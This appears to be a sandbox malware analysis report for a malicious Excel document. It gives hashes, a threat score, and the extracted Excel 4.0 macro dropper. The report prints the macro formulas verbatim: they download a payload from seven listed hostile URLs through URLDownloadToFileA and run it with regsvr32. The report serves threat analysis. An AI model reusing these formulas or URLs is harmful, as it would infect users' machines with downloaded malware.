Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

General

  • Target

    c962cc57dbdeefa99defee4a259ea3ae5029f6d24a57edd3935f84b54606c0d7

  • Size

    38KB

  • Sample

    241111-1scfgaxepk

  • MD5

    dde327c07219bc9bd171b08eebca2fe2

  • SHA1

    d10b22a5414f6dd8629e0a023af5f8bdc4a67eee

  • SHA256

    c962cc57dbdeefa99defee4a259ea3ae5029f6d24a57edd3935f84b54606c0d7

  • SHA512

    bd7157a9735100957f52184484e95288e6b88cd6e6976d0d1d7965bb494b2768de94f78217f04999d46097507439597d7cd10177857109c1a7d1e4148a6355b7

  • SSDEEP

    768:1snACdQR84jOZpqcVbZYpoRuBlIiOKMArOooooooooooooooooooooooooooFVIX:WA6gvOZZ1ZYpoQ/pMAeVIyP54T

Score
10/10

Malware Config

Extracted

Rule
Excel 4.0 XLM Macro
C2

https://landingpageis.com/alfacgiapi/IhZmV1LIJwi6O/

https://londoninsurancelife-lmg.com/wp-content/HukqubgSP/

https://franciscosobrado.com/wp-content/xp/

https://britainsolicitors.com/wp-admin/disNolZkYooJTascNDEk/

https://www.curtisse.com/wordpress/kXUx9P38X/

https://bsprabodhini.org/wp-content/i1e8aSEloGChNad3m/

https://toyota-4wd.com/wp-content/55d3MMJGg6CMSFhS/

Attributes
  • formulas

    =CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://landingpageis.com/alfacgiapi/IhZmV1LIJwi6O/","..\roil.ocx",0,0) =IF('HUNJK'!E15<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://londoninsurancelife-lmg.com/wp-content/HukqubgSP/","..\roil.ocx",0,0)) =IF('HUNJK'!E17<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://franciscosobrado.com/wp-content/xp/","..\roil.ocx",0,0)) =IF('HUNJK'!E19<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://britainsolicitors.com/wp-admin/disNolZkYooJTascNDEk/","..\roil.ocx",0,0)) =IF('HUNJK'!E21<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://www.curtisse.com/wordpress/kXUx9P38X/","..\roil.ocx",0,0)) =IF('HUNJK'!E23<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://bsprabodhini.org/wp-content/i1e8aSEloGChNad3m/","..\roil.ocx",0,0)) =IF('HUNJK'!E25<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://toyota-4wd.com/wp-content/55d3MMJGg6CMSFhS/","..\roil.ocx",0,0)) =IF('HUNJK'!E27<0,CLOSE(0),) =EXEC("C:\Windows\SysWow64\regsvr32.exe -s ..\roil.ocx") =RETURN()

Extracted

Language
xlm4.0
Source
URLs
xlm40.dropper

https://landingpageis.com/alfacgiapi/IhZmV1LIJwi6O/

Targets

    • Target

      c962cc57dbdeefa99defee4a259ea3ae5029f6d24a57edd3935f84b54606c0d7

    • Size

      38KB

    • MD5

      dde327c07219bc9bd171b08eebca2fe2

    • SHA1

      d10b22a5414f6dd8629e0a023af5f8bdc4a67eee

    • SHA256

      c962cc57dbdeefa99defee4a259ea3ae5029f6d24a57edd3935f84b54606c0d7

    • SHA512

      bd7157a9735100957f52184484e95288e6b88cd6e6976d0d1d7965bb494b2768de94f78217f04999d46097507439597d7cd10177857109c1a7d1e4148a6355b7

    • SSDEEP

      768:1snACdQR84jOZpqcVbZYpoRuBlIiOKMArOooooooooooooooooooooooooooFVIX:WA6gvOZZ1ZYpoQ/pMAeVIyP54T

    Score
    10/10
    • Process spawned unexpected child process

      This typically indicates the parent process was compromised via an exploit or macro.

MITRE ATT&CK Enterprise v15

Tasks